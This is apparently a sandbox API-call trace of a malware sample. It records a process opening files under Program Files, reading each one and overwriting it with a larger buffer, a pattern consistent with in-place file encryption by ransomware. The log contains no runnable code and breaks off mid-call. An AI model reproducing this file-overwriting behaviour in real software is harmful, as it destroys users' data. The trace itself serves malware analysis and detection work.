[0141.243] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1b [0141.243] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.244] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.244] ReleaseMutex (hMutex=0x168) returned 1 [0141.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Christmas", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.244] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Christmas", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Christmas", lpUsedDefaultChar=0x0) returned 9 [0141.244] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x311f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.245] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.245] WriteFile (in: hFile=0x1dc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x311f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.246] CloseHandle (hObject=0x1dc) returned 1 [0141.246] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Reunion" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\reunion"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.246] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.247] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0141.247] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.247] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.247] ReleaseMutex (hMutex=0x168) returned 1 [0141.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reunion", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.247] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Reunion", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Reunion", lpUsedDefaultChar=0x0) returned 7 [0141.247] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.249] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.249] WriteFile (in: hFile=0x1dc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.249] CloseHandle (hObject=0x1dc) returned 1 [0141.250] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Easter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\easter"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.250] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.250] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4e0 [0141.251] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.251] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.251] ReleaseMutex (hMutex=0x168) returned 1 [0141.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Easter", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.251] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Easter", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Easter", lpUsedDefaultChar=0x0) returned 6 [0141.251] ReadFile (in: hFile=0x1dc, lpBuffer=0x286d468, nNumberOfBytesToRead=0x4e0, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286d468*, lpNumberOfBytesRead=0x311f2bc*=0x4e0, lpOverlapped=0x0) returned 1 [0141.260] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.261] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa68, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x311f2d0*=0xa68, lpOverlapped=0x0) returned 1 [0141.261] CloseHandle (hObject=0x1dc) returned 1 [0141.261] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Guadalcanal" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\guadalcanal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.262] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.263] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0141.263] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.263] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.263] ReleaseMutex (hMutex=0x168) returned 1 [0141.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guadalcanal", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0141.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Guadalcanal", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Guadalcanal", lpUsedDefaultChar=0x0) returned 11 [0141.263] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.265] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.265] WriteFile (in: hFile=0x1dc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.265] CloseHandle (hObject=0x1dc) returned 1 [0141.266] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Marquesas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\marquesas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.266] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.266] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0141.267] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.267] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.267] ReleaseMutex (hMutex=0x168) returned 1 [0141.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Marquesas", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.267] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Marquesas", cchWideChar=9, lpMultiByteStr=0x1f7344c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Marquesas", lpUsedDefaultChar=0x0) returned 9 [0141.267] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0141.268] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.269] WriteFile (in: hFile=0x1dc, lpBuffer=0x1effa98*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1effa98*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0141.269] CloseHandle (hObject=0x1dc) returned 1 [0141.269] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Pitcairn" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\pitcairn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.270] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.270] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4d [0141.270] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.270] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.270] ReleaseMutex (hMutex=0x168) returned 1 [0141.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pitcairn", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Pitcairn", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pitcairn", lpUsedDefaultChar=0x0) returned 8 [0141.271] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f9fc48, nNumberOfBytesToRead=0x4d, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fc48*, lpNumberOfBytesRead=0x311f2bc*=0x4d, lpOverlapped=0x0) returned 1 [0141.897] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.897] WriteFile (in: hFile=0x1dc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d5, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x5d5, lpOverlapped=0x0) returned 1 [0141.897] CloseHandle (hObject=0x1dc) returned 1 [0141.897] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Pacific\\Wake" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\pacific\\wake"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0148.807] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0148.808] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x41 [0148.808] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0148.808] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.808] ReleaseMutex (hMutex=0x168) returned 1 [0148.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wake", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0148.808] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Wake", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Wake", lpUsedDefaultChar=0x0) returned 4 [0148.808] ReadFile (in: hFile=0x1dc, lpBuffer=0x1fc1f08, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fc1f08*, lpNumberOfBytesRead=0x311f2bc*=0x41, lpOverlapped=0x0) returned 1 [0148.809] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0148.809] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5c9, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5c9, lpOverlapped=0x0) returned 1 [0148.810] CloseHandle (hObject=0x1dc) returned 1 [0148.810] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\SystemV\\EST5EDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\systemv\\est5edt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0148.810] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0148.811] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x8f0 [0148.811] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0148.811] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.811] ReleaseMutex (hMutex=0x168) returned 1 [0148.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EST5EDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0148.811] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="EST5EDT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="EST5EDT", lpUsedDefaultChar=0x0) returned 7 [0148.811] ReadFile (in: hFile=0x1dc, lpBuffer=0x25a3b68, nNumberOfBytesToRead=0x8f0, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a3b68*, lpNumberOfBytesRead=0x311f2bc*=0x8f0, lpOverlapped=0x0) returned 1 [0148.880] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0148.880] WriteFile (in: hFile=0x1dc, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xe78, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x311f2d0*=0xe78, lpOverlapped=0x0) returned 1 [0148.881] CloseHandle (hObject=0x1dc) returned 1 [0148.881] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\WET" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\wet"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0148.882] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0148.882] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x42c [0148.882] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0148.882] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0148.883] ReleaseMutex (hMutex=0x168) returned 1 [0148.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WET", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0148.883] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WET", cchWideChar=3, lpMultiByteStr=0x1f7ad44, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WET", lpUsedDefaultChar=0x0) returned 3 [0148.883] ReadFile (in: hFile=0x1dc, lpBuffer=0x269c668, nNumberOfBytesToRead=0x42c, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269c668*, lpNumberOfBytesRead=0x311f2bc*=0x42c, lpOverlapped=0x0) returned 1 [0149.023] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0149.023] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9b4, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9b4, lpOverlapped=0x0) returned 1 [0149.024] CloseHandle (hObject=0x1dc) returned 1 [0149.024] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0149.025] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.026] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4360 [0149.026] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.026] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.026] ReleaseMutex (hMutex=0x168) returned 1 [0149.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as80.xsl", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0149.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="as80.xsl", cchWideChar=8, lpMultiByteStr=0x1f7366c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="as80.xsl", lpUsedDefaultChar=0x0) returned 8 [0149.026] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.028] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3360 [0149.028] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x311f278*=0x1000, lpOverlapped=0x0) returned 1 [0149.029] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x311f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f2e8*=0) returned 0x3360 [0149.029] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x311f28c*=0x1588, lpOverlapped=0x0) returned 1 [0149.029] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f2bc*=0) returned 0x0 [0149.029] WriteFile (in: hFile=0x1dc, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x311f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x311f28c*=0x1000, lpOverlapped=0x0) returned 1 [0149.030] CloseHandle (hObject=0x1dc) returned 1 [0149.030] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0149.031] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.031] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xa2d68 [0149.031] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0149.032] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0149.032] ReleaseMutex (hMutex=0x168) returned 1 [0149.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msmdsrv.rll", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0149.032] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msmdsrv.rll", cchWideChar=11, lpMultiByteStr=0x1f7320c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msmdsrv.rll", lpUsedDefaultChar=0x0) returned 11 [0149.032] ReadFile (in: hFile=0x1dc, lpBuffer=0x288f948, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x311f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x311f278*=0xf000, lpOverlapped=0x0) 